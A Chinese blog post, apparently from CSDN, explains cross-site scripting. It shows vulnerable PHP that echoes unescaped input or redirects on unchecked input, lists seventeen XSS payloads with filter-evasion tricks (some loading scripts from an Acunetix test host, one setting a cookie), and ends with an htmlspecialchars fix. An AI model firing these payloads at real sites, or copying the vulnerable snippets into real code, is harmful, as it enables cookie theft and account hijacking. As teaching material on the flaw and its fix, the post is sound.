XSS跨站漏洞(Cross-site scripting):

最新推荐文章于 2023-07-13 21:35:40 发布
最新推荐文章于 2023-07-13 21:35:40 发布
阅读量1.3k 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sinat_21509375/article/details/43097307
版权
Ø XSS 跨站漏洞 ( Cross-site scripting )
跨站点脚本攻击( XSS/CSS )安全缺陷,往往存在于那些提供动态网页的 Web 应用系统中。这类 Web 站点提供动态的页面,这类页 面由为用户动态建造的多个源站点的信息组成。如果应用系统存在该漏洞,则攻击者可以将恶意内容(一般为代码)插入到 Web 点提供动态的页面中,以收集其他用户在使用被攻击页时提交的重要信息,或简单的在其它用户的浏览器上执行攻击脚本代码。
Ø 代码示例:
Exp 1:
<?php
$error_message = $_GET['error'];
print $error_message ;
?>
Exp2
<?php
redirect_page = $_GET['page'];
header ("Location: " . redirect_page);
?>
Ø 利用方法:
1. <script>alert(document.cookie)</script> …… .
2. http://www.a.php ………..
XSS 漏洞分类
XSS 的按照攻击时漏洞利用方式大体分为两种 :
反射型 XSS 构造特殊 url, 引诱用户去访问 , 盗取用户登陆 cookie ,获取用户资料,下载木马
持久型 XSS :灌入有漏洞页面特殊数据,用户访问后,获取资料,窃取登陆 cookie, 按照木马
XSS 漏洞实例剖析
<?php
echo isset($_GET['msg'])?$_GET[‘msg’]:””;?>
利用方式
1. ? msg=1<script>alert(404667579926)</script>
2. ?msg=1<ScRiPt%20%0a%0d>alert(404677579926)%3B</ScRiPt>
3. ?msg=%3Cimg%20src%3D%22JaVaS%26%2399%3BRiPt:alert%28404757579926%29%3B%22%3E
4. ?msg=1<%00script>alert(404777579932)%3B</script>
5. ?msg=1<DIV+STYLE="width:expression(alert(404797579932))%3B">
6. ?msg=1<FRAMESET><FRAME+SRC="JaVaS%26%2399%3BRiPt:alert(404807579932)%3B"></FRAMESET>
7. ?msg=1%3Cimg%20dynsrc%3D%22JaVaScRiPt:alert%28404817579932%29%3B%22%3E
8. ?msg=1<META+HTTP-EQUIV="refresh"+CONTENT="0%3Burl=JaVaS%26%2399%3BRiPt:alert(404827579932)%3B">
9. ?msg=1<iframe+src="data:text/html%3Bbase64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo= "+invalid="404837579932">
10. ?msg=1<embed+src="http://testphp.acunetix.com/xss.swf?404847579932"+type="application/x-shockwave-flash"/>
11. ?msg=1<body+οnlοad=alert(404857579932)>
12. ?msg=1<ScRiPt+src=http://testphp.acunetix.com/xss.js?404867579932></ScRiPt>
13. ?msg=1<img+src=http://testphp.acunetix.com/dot.gif+οnlοad=alert(404897579939)>
14. ?msg=1<script/xss+src=http://testphp.acunetix.com/xss.js?404887579939></script>
15. ?msg=1<ScRiPt+bad=">"+src="http://testphp.acunetix.com/xss.js?404927579939"></ScRiPt>
16. ?msg=%3C/xss/*-*/style=xss:e/**/xpression(alert(405067579944))%3E
17. ?msg=<meta+http-equiv='Set-cookie'+content='cookiename=cookievalue'>
Ø 危害
获取用户信息 , 冒充用户登录 , 传播木马信息 , 散布违禁信息 …… .
Ø 防范方法
另外一个 Web 应用安全的基础是对输出进行转义或对特殊字符进行编码,以保证原意不变。输出转义是对 xss 防范 基础
Ø 怎么样进行过滤
l 识别输 - 它是什么,做什么用 ?
l 输出转义 - 在外系统中特殊字符的可靠和完整的列表
l 区分已 转义 未转义 数据 - 定义已经过滤的数组
修改方法:
<?php
$error_message = $_GET['error'];
$html=array();
$html['error']=htmlspecialchars($error_message, ENT_QUOTES);
echo $html['error'];
?>

幻想家游记
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
跨站脚本攻击XSS(Cross Site Scripting)总结
野原新之助
01-31 993
XSS是指开发者在开发网页时,对用户的输入没有进行安全过滤,导致用户在可以输入内容的地方,插入脚本语句,执行恶意脚本代码,可以对数据库、服务器、用户等造成影响和危害,危险等级很高,也很常见。
Cross-Site ScriptingXSS)简介
weixin_30784945的博客
07-13 299
  最近才开始研究HTML以及安全问题。如果有什么说得不对的地方,望请指出。   在网络应用安全中,XSS可能是最常见,范围最大,所包含攻击方法最多,同时也是最难以理解的一种攻击。在OWASP所列出的十大网络应用安全风险中,其排名第二位,仅次于SQL Injection。   而在本篇文章中,我们将一步一步深入挖掘XSS的攻击流程,攻击手段,以及防御方法等各个方面。 XSS示...
XSS(Cross Site Scripting跨站脚本攻击)
weixin_45760365的博客
03-31 1252
XSS(Cross Site Scripting跨站脚本攻击)
XSS (Cross-Site Scripting跨站脚本)
今天的风儿甚是喧嚣
07-07 768
XSS常见漏洞及其防御绕过方法
什么是XSS(Cross Site Scripting
走向未来
04-23 1726
什么是XSS(Cross Site Scripting) (1)恶意用户将代码植入到提供给其他用户使用的页面中,未经转义的恶意代码输出到其他用户的浏览器执行; (2)用户浏览页面的时候嵌入页面中的脚本(js)会被执行,攻击用户; (3)主要分为两类:反射型(非持久型),存储型(持久型); 如何防范XSS? 不要相信用户的任何输入; (1)过滤(输入和参数); 对敏感标签 ...
XSS.rar_XSS_cross scripting_cross site java_cross site scripting
09-14
XSS,全称为"Cross Site Scripting",是一种常见的网络安全漏洞,它允许攻击者在用户的浏览器中注入恶意脚本。这种攻击方式通常发生在Web应用中,攻击者利用网站未能充分过滤或转义用户输入的数据,将恶意代码嵌入到...
第一节 XSS跨站脚本分类-01
最新发布
09-15
XSS 跨站脚本攻击(Cross Site Scripting)是一种常见的 Web 应用程序安全漏洞。攻击者可以通过在 Web 页面中插入恶意 Script 代码来攻击用户。XSS 攻击的原理是,当用户浏览包含恶意 Script 代码的 Web 页面时,该 ...
xss-payload-list::bullseye:跨站点脚本(XSS漏洞有效负载列表
05-22
:rocket: 跨站点脚本(XSS漏洞有效负载列表 :rocket: 概述 : 跨站点脚本(XSS)攻击是一种注入,其中恶意脚本被注入到原本良性和可信任的网站中。 当攻击者使用Web应用程序将恶意代码(通常以浏览器脚本的形式)...
Complete Cross-site Scripting Walkthrough
10-01
Complete Cross-site Scripting Walkthrough
XSS跨站脚本攻击漏洞修复方法
06-18
XSS(Cross-Site Scripting跨站脚本攻击是一种常见的网络安全威胁,它允许攻击者在用户的浏览器上执行恶意代码,从而窃取用户敏感信息、操纵用户行为或者对网站进行破坏。本文将深入探讨XSS攻击的类型、危害,并...
Cross site scripting公司项目被检测出项目存在XSS跨站脚本攻击漏洞
Crazy的博客
08-01 204
记个加班要做的事,,,,公司项目被检测出XSS攻击漏洞 点击了解什么是XSS攻击 解决思路:自定义个过滤器,过滤掉所有请求中的非法参数 代码记录:公司名用***代替了 web.xml配置这个过滤器写在靠前的位置 <filter> <filter-name>XssFilter</filter-name> <filter-class>com.***.utils.XssFilter</filter-class> </filter>
JavaScript学习笔记-跨站脚本(Cross-site scripting,CSS,XSS)漏洞
lyzcren的博客
01-04 1373
Cross Site Script,缩写CSS又叫XSS,中文意思跨站脚本攻击,指的是恶意攻击者往Web页面里插入恶意html代码。 它指的是恶意攻击者往Web页面里插入恶意html代码,当用户浏览该页之时,嵌入其中Web里面的html代码会被执行,从而达到恶意用户的特殊目的。XSS属于被动式的攻击,因为其被动且不好利用,所以许多人常忽略其危害性。 维基百科:https://en.wikipe
Web安全测试之XSS
weixin_34234829的博客
03-21 358
XSS 全称(Cross Site Scripting) 跨站脚本***, 是Web程序中最常见的漏洞。指***者在网页中嵌入客户端脚本(例如JavaScript), 当用户浏览此网页时,脚本就会在用户的浏览器上执行,从而达到***者的目的. 比如获取用户的Cookie,导航到恶意网站,携带***等。 作为测试人员,需要了解XSS的原理,***场景,如何修复。 才能有效...
网络攻击技术(二)——Cross-site scripting
stilling2006的专栏
01-21 6513
http://www.oschina.net/question/565065_57506 1.1.1 摘要 在本系列的第一篇博文中,我向大家介绍了SQL Injection常用的攻击和防范的技术。这个漏洞可以导致一些非常严重的后果,但幸运的是我们可以通过限制用户数据库的权限、使用参数化的SQL语句或使用ORM等技术来防范SQL Injection的发生,接来了要向大家介绍Cross-s
Cross-site Scripting (XSS)
kezhen的专栏
03-26 4843
Overview Cross-Site Scripting (XSS) attacks are a type of injection problem, in which malicious scripts are injected into the otherwise benign and trusted web sites. XSS attacks occur when an attacke
pikachu漏洞平台学习笔记2_Cross-site Scripting跨站脚本攻击)
qq_38933307的博客
03-26 666
1.漏洞描述 使用工具hackbar XSS跨站脚本)概述 Cross-Site Scripting 简称为“CSS”,为避免与前端叠成样式表的缩写"CSS"冲突,故又称XSS。一般XSS可以分为如下几种常见类型: 1.反射性XSS; 2.存储型XSS; 3.DOM型XSS; XSS漏洞一直被评估为web漏洞中危害较大的漏洞,在OWASP TOP10的排名中一直属于前三的江湖地位。 XSS是一种发生在前端浏览器端的漏洞,所以其危害的对象也是前端用户。 形成XSS漏洞的主...
acunetix wvs网站漏洞扫描 XSS CSOR处理
qq_26372385的博客
08-25 2950
acunetix wvs 跨站脚本攻击漏洞 应用程序错误消息漏洞 页面错误消息漏洞 目录列表漏洞 跨域漏洞处理。
XSS (Cross-Site-Scripting)笔记
收集盒 Book box
03-28 885
Michael Cross-Site-Scripting也称跨站脚本攻击,缩写通常为XSS. 或者先到这里补充下知识:http://en.wikipedia.org/wiki/Cross-site_scripting 由于工作需要最近在研究一些常用的攻击方式和漏洞,用以预防和修复.如果你还没有听过说这些,可能你需要先阅读下以下的内容以帮助你快速进入状态。 XSS主要可分
CORS跨域访问漏洞
m0_73896875的博客
07-13 5733
全称是“跨域资源访问共享”(Cross-Origin Resource Sharing),是一种用于解决跨域资源访问限制的机制。它允许在浏览器中进行跨域请求,并控制跨域请求的安全性。同源策略(Same-Origin Policy)是浏览器的一种安全策略,它要求在访问资源时,请求的域名、协议和端口必须与资源所在的域名、协议和端口完全匹配。如果两个资源的域名、协议和端口不匹配,浏览器会限制跨域请求,并阻止脚本访问返回的响应数据。CORS 提供了一种机制,允许服务器端声明它所支持的跨域请求。
Vulnerability classifications CWE-16: Configuration CWE-436: Interpretation Conflict CAPEC-63: Cross-Site Scripting (XSS)表示什么
06-09
这段文字列出了三种安全漏洞分类: 1. CWE-16: Configuration,即配置问题,指的是由于应用程序配置不当而导致的安全漏洞。 2. CWE-436: Interpretation Conflict,即解释冲突,指的是由于 HTTP 响应头中的 Content-type 字段与响应内容的 MIME 类型不一致而导致的安全漏洞。 3. CAPEC-63: Cross-Site Scripting (XSS),即跨站脚本攻击,指的是攻击者通过在网页中注入恶意脚本来窃取用户信息或执行其他恶意操作的攻击方式。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值